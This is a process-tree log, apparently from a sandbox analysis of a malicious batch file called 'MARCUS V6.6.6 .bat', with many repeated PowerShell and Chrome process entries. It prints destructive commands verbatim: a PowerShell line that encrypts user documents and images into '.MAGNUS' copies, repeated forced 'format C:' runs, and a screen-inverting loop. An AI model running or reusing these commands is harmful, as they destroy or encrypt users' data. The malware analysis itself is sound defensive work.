                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6464
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6588
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6728
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6856
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6992
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7132
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6576
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6976
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6964
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7304
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7472
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7624
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7752
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7892
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:7268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:7736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:7720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8476
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:7968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:9020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:8716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9320
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:10032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:10164
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:10160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:9392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:10268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:10400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:10528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:10664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:10804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:10936
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:11068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:11204
        • C:\Windows\system32\wermgr.exe
          "C:\Windows\system32\wermgr.exe" "-outproc" "0" "11204" "1876" "1792" "1880" "0" "0" "1884" "0" "0" "0" "0" "0"
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:10384
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
    1⤵
    PID:9584
    • C:\Windows\system32\chcp.com
      chcp 1250
      2⤵
      PID:10396
    • C:\Windows\system32\mode.com
      mode 85,30
      2⤵
      PID:11108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "$klucz=New-Object Byte[] 32; (New-Object Security.Cryptography.RNGCryptoServiceProvider).GetBytes($klucz); ls C:\Users -Recurse -Include *.doc,*.xls,*.jpg | % { [IO.File]::WriteAllBytes($_.FullName+'.MAGNUS', (New-Object Security.Cryptography.AesManaged).CreateEncryptor().TransformFinalBlock([IO.File]::ReadAllBytes($_),0,$_.Length) }"
      2⤵
      PID:11256
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Checks SCSI registry key(s)
    PID:3800
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\cdffd5b55a98432da6ea9da6b95c1e9d /t 3912 /p 4436
    1⤵
    PID:1568
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
                                                                                                            • Enumerates system info in registry
                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                            PID:472
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff2496dcf8,0x7fff2496dd04,0x7fff2496dd10
                                                                                                              2⤵
                                                                                                                PID:9072
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:2
                                                                                                                2⤵
                                                                                                                  PID:9192
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:3
                                                                                                                  2⤵
                                                                                                                    PID:7724
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2436,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2604 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:2272
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:6048
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:6056
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3844 /prefetch:2
                                                                                                                          2⤵
                                                                                                                            PID:4216
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:6812
                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                            1⤵
                                                                                                                              PID:8316
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
                                                                                                                              1⤵
                                                                                                                                PID:7248
                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                  chcp 1250
                                                                                                                                  2⤵
                                                                                                                                    PID:8020
                                                                                                                                  • C:\Windows\system32\mode.com
                                                                                                                                    mode 85,30
                                                                                                                                    2⤵
                                                                                                                                      PID:7200
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                      2⤵
                                                                                                                                        PID:7264
                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                        2⤵
                                                                                                                                          PID:7596
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                          2⤵
                                                                                                                                            PID:7856
                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                            2⤵
                                                                                                                                              PID:7792
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                              2⤵
                                                                                                                                                PID:7424
                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                2⤵
                                                                                                                                                  PID:8176
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:7612
                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                    2⤵
                                                                                                                                                      PID:6304
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:8132
                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                        2⤵
                                                                                                                                                          PID:7288
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:8396
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aj035jz\0aj035jz.cmdline"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:8756
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8884
                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                chcp 1250
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:9032
                                                                                                                                                                • C:\Windows\system32\mode.com
                                                                                                                                                                  mode 85,30
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:9052
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:9144
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige4gybm\ige4gybm.cmdline"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:9376
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:9324
                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                          chcp 1250
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:9524
                                                                                                                                                                          • C:\Windows\system32\mode.com
                                                                                                                                                                            mode 85,30
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1960
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:9668
                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:9700
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                  2⤵
        PID:9840
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:9964
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10232
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10208
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10228
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:9288
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:9556
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10100
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10196
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10204
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:4980
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10004
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:9996
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:9820
    • C:\Windows\system32\cmd.exe
